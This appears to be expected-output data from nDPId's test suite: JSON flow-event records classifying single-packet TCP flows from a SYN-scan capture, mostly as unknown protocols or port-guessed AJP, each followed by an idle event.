+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 